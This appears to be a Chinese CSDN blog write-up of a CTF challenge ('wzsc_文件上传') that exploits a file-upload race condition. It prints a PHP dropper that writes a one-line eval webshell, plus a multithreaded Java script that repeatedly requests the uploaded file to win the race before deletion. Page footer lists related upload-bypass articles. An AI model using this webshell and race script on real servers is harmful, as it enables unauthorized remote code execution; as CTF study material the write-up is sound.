【漏洞攻击之文件上传条件竞争】

已于 2024-01-18 03:17:51 修改
阅读量764 收藏 8
点赞数 11
分类专栏: 渗透 文章标签: java 安全性测试
于 2024-01-18 03:06:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackbtuwhite/article/details/135663578
版权

漏洞攻击之文件上传条件竞争

wzsc_文件上传

漏洞现象与分析

在这里插入图片描述只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描web目录,查看是否有机可乘
在这里插入图片描述扫描得知有关键的flag.php页面和upload文件根路径和upload.php页面,php文件查看了都没有渲染有用的信息…但是upload文根重定向到文件上传的页面
在这里插入图片描述并且上传的php木马等都会被过滤,判断源码中有校验白名单,联想到文件上传的条件竞争

php校验文件上传的时候先写入,判断不符合后,再回退
由于服务器并发处(同时)理多个请求,假如a用户上传了一个文件,b用户访问a用户的文件就会出现以下三种情况:
1.访问时间点在上传文件之前,没有此文件
2.访问时间在上传文件之后,且服务器还未将其删除,文件存在
3.访问时间点在服务器删除文件之后,文件不存在

思路

思路清晰,先说BP
在服务器释放上传的php文件之前先让该文件被执行,那么操作权就在我们手上了,这里我们让生成蚁剑的webshell木马,再通过提权webshell获取源码拿到flag

编写攻击脚本和重放措施

php上传的脚本为:

<?php 
fputs(fopen("shell.php", "w"), '<?php @eval($_POST["cmd"]); ?>'); 
?>

执行该脚本打时候调用fopen函数,写入webshell的木马。
该脚本为upload,在burpsuite手动重放即可,记得点快一点
小编使用java多线程破坏服务器的退回操作,上脚本:

@SpringBootApplication
@Slf4j
public class Application {

    @Bean
    public OkHttpClient okHttpClient() {
        return new OkHttpClient();
    }

    private static final String requestUrl = "http://61.147.171.105:51022/upload/test.php";

    public static String sendRequest(OkHttpClient okHttpClient, String url) throws IOException {
        Request request = new Request.Builder().url(url).build();
        try (Response response = okHttpClient.newCall(request).execute()) {
            if (!response.isSuccessful()) {
                throw new IOException("Unexpected code " + response);
            }
            return Objects.requireNonNull(response.body()).string();
        }
    }

    public static void main(String[] args) {
        ConfigurableApplicationContext applicationContext = SpringApplication.run(Application.class, args);
        OkHttpClient okHttpClient = applicationContext.getBean("okHttpClient", OkHttpClient.class);
        for (int i = 0; i < 50; i++) {
            new Thread(() -> {
                int num = 0;
                while (true) {
                    log.warn("{}第{}次请求", Thread.currentThread().getName(), num++);
                    try {
                        String resp = sendRequest(okHttpClient, requestUrl);
                        log.info("数据获取成功{}", resp);
                        System.exit(0);
                    } catch (IOException e) {
                    }
                }
            }, "threadNo" + i).start();
        }
    }
}

最终java脚本结束:
在这里插入图片描述
我们访问upload文根查看结果
在这里插入图片描述
木马上传成功!

中国蚁剑拿flag

在这里插入图片描述在这里插入图片描述

在这里插入图片描述提交flag
在这里插入图片描述

BlackBtuWhite
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手把手教菜鸟抓包改包构造上传漏洞拿shel
05-11
手把手教菜鸟抓包改包构造上传漏洞拿shel
AWD攻防漏洞分析——文件上传
01-20
概述 这个漏洞在DVBBS6.0时代被hacker们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级高,入侵中上传漏洞也是常见的漏洞。 导致改漏洞的原因在于代码...7、绕过服务端漏洞上传webshell 8、利用.htacc
条件竞争文件上传
weixin_46239998的博客
01-07 740
一、条件竞争介绍条件竞争,在程序员日常的Web应用开发中,通常不如其他漏洞受到的关注度高。因为普遍的共识是,条件竞争是不可靠的,大多数时候只能靠代码审计来识别发现,而依赖现有的工具或技术很难在黑盒灰盒中识别并进行攻击。即便该漏洞很难被发现,也仍然有很多企业曾被曝出相关漏洞,例如星巴克咖啡、小密圈的App 产品等。今天要讲解的条件竞争漏洞仅限于Web应用之中。
漏洞利用】文件上传漏洞详细解析
weixin_44023442的博客
01-22 2508
参考文章 文件上传漏洞攻击与防范方法 Web渗透之文件上传漏洞总结 内部常见的文件上传的检测方式与绕过方法 BookFresh棘手文件上传绕过RCE 文件上传条件竞争 Tag: #文件上传 一、漏洞介绍 文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。 二、漏洞原理 程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合
iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传
最新发布
mooyuan的博客
04-21 664
通过对iwebsec靶场文件上传的第七关卡讲解条件竞争法实现文件上传的方法,通过python脚本配合burpsuite工具实现渗透过程。
文件上传绕过】——条件竞争漏洞
weixin_45588247的博客
07-16 4084
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞原理:五、实验过程:1. 场景:2. 实验步骤: 一、实验目的: 1、通过代码审计学习造成条件竞争漏洞的成因。 2、通过upload-labs闯关游戏(Pass-17)闯关游戏,学会条件竞争漏洞利用技巧。 二、工具: 火狐/谷歌浏览器 burpsuite 三、实验环境: 靶 机: windows10虚拟机:192.168.100.150       upload-labs-master闯关游戏      &nbsp
【愚公系列】2023年06月 攻防世界-Web(wzsc_文件上传
时光隧道
06-17 4996
文件上传漏洞(File Upload Vulnerability)是指攻击者通过某种方式绕过应用程序上传文件的安全检测机制,将恶意文件或脚本上传至目标服务器,达到执行任意恶意代码的目的。攻击者可以通过此漏洞窃取、篡改、删除或破坏网站数据,或对受害者发起其他形式的攻击文件上传漏洞可能出现在各种类型的Web应用程序中,包括电子商务、CMS、论坛、博客、社交网络和在线媒体等。攻击者通常会利用Web应用程序提供的文件上传功能,来上传恶意文件。
攻防世界-web-wzsc_文件上传
mlws1900的博客
08-24 3482
1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。在删除之前访问上传的php文件,从而执行上传文件中的php代码。服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件。可以看到shell已经被上传,用蚁剑连接。上传一个空内容的jpg文件,上传成功。打开环境,很简单的上传界面。1. 文件上传过程介绍。例如:上传文件代码如下。此为需要上传的文件内容。利用条件竞争文件上传
wzsc_文件上传
m0_70819573的博客
02-18 945
其原理是在上传时平台不会立刻删除文件,会保留极短的一段时间,利用其间隙访问,就可以创造出php文件。题目本身逻辑很简单,不过黑盒测试真的费脑子,有十多种解法,不过上传图片时回显有提醒。同时用薄荷将两个数据包调整为无负载,并一直持续攻击,注意抓包的线程要比上传包多。文件上传题型有许多解法,这道题使用条件竞争去解决。也可以用python脚本去做,附上大佬的脚本。3.最后用蚁剑连接,获取flag。
wzsc_文件上传条件竞争
Welcome To Myon'Blog !
10-04 1225
我们可以使用多线程并发的访问上传的文件,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件(m.php),一旦我们成功访问到了上传的文件(m.php),那么它就会向服务器写一个shell(shell.php)。换句话说,我们最终利用的并不是我们上传的文件,上传只是为了能有一刻成功访问,一旦访问成功,便会写入一句话木马,我们最终利用的就是新写入的php文件。但是通过抓包我们可以发现,其实php文件以及配置文件都是上传成功了的(响应200)filename=m.php(即我们上传的文件)
web网站文件上传漏洞攻击-运维安全详细笔记
06-30
web网站文件上传漏洞攻击-运维安全详细笔记
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
你不知道的文件上传漏洞php代码分析
12-18
文件上传攻击示例 upload.php <?php $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $...
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
文件上传漏洞(基于upload-labs靶场)针对Windows系统特性的绕过
Welcome To Myon'Blog !
12-19 1169
我再强调一遍,关于文件上传漏洞的题,绝大多数情况下我们是无法知道后端源码的,只有每个方向慢慢尝试,并不是说看到就知道要用什么方法,都是不断换方向试出来的。 这里要使用的是空格绕过,那么它基于的原理就是: Windows系统对于文件的重命名会自动把空格给去掉 (这里如果直接在上传时添加空格是不行的) 所以我们需要进行抓包,然后在抓到的数据包中将文件名后缀加上空格,即可实现绕过。
CTF之wzsc_文件上传
qq_74263993的博客
03-22 372
这个代码是让服务器自己生成一个shell.php文件(自己生成的不会删除)并在shell.php文件中写入后面那一段宝贝(懂得都懂)。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,但他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。拿到题目一看就是文件上传漏洞,但是这个题目上传php文件以及其他我知道可以执行漏洞的文件都会被瞬间删除。接着便是利用大佬的python脚本对上传的m. php文件进行执行,以达到让服务器自己生成shell.php。brupsuit拦截发给攻击
文件上传条件竞争
qq_53829555的博客
09-21 4585
随着科技不断的发展,网络安全成为了一个大家都要注意与关心的话题,今天小编就带大家了解与复现一下文件上传漏洞中的条件竞争漏洞
条件竞争】攻防世界web进阶区 泰山杯 wzsc_文件上传
qq_45608153的博客
08-12 2815
攻防世界web进阶区 泰山杯 wzsc_文件上传
时间条件竞争漏洞 cms
12-20
时间条件竞争漏洞是一种常见的网络安全漏洞,通常发生在CMS(内容管理系统)中。这种漏洞利用了程序中的时间相关功能,例如文件的创建或修改时间,来进行攻击攻击者可以利用这个漏洞来获取未授权的访问权限,或者进行其他恶意操作。 时间条件竞争漏洞的原理是在程序执行的不同时间点进行不同的操作,从而绕过系统的安全检查。例如,攻击者可以在某个请求发送后立即修改文件,然后在系统检查文件时,修改已经生效,导致安全检查失败。 要防范时间条件竞争漏洞,首先需要对CMS系统进行严格的安全审计和测试,确保程序中没有潜在的时间条件竞争漏洞。其次,开发人员需要在代码中加入适当的同步和锁定机制,以防止在不同时间点发生冲突,从而避免漏洞的利用。另外,及时更新CMS系统的补丁,也是防范时间条件竞争漏洞的有效措施。 总的来说,时间条件竞争漏洞是一种常见但危险的安全漏洞,对于CMS系统的开发和管理者来说,需要高度重视并采取相应的安全措施来防范这类漏洞的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值